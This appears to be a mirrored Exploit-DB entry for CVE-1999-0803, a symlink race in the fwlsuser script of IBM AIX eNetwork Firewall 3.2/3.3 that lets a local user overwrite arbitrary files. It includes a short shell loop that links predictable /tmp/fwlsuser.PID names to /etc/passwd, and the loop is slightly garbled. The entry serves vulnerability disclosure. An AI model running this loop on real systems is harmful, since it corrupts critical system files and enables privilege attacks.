- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 19229
- Проверка EDB
-
- Пройдено
- Автор
- PAUL CAMMIDGE
- Тип уязвимости
- LOCAL
- Платформа
- AIX
- CVE
- cve-1999-0803
- Дата публикации
- 1999-05-25
IBM AIX eNetwork Firewall 3.2/3.3 - Insecure Temporary File Creation
Код:
soure: https://www.securityfocus.com/bid/287/info
IBM's eNetwork Firewall for AIX contains a number of vulnerability in scripts which manipulate files insecurely. When fwlsuser script is run it creates a temporary file called /tmp/fwlsuser.PID ( where PID is the process ID of the command being run ). If this file is created previously and is a link to any other file the output generated by the fwlsuser script will overwrite this linked file.
x = 5000
while true
LOCAL FIX AS REPORTED BY ORIGINATOR:
ln -s /etc/passwd /tmp/fwlsuser.$x
# rm /tmp/fwlsuser.$x
let x=$x+1
echo $x
done
exit- Источник
- www.exploit-db.com
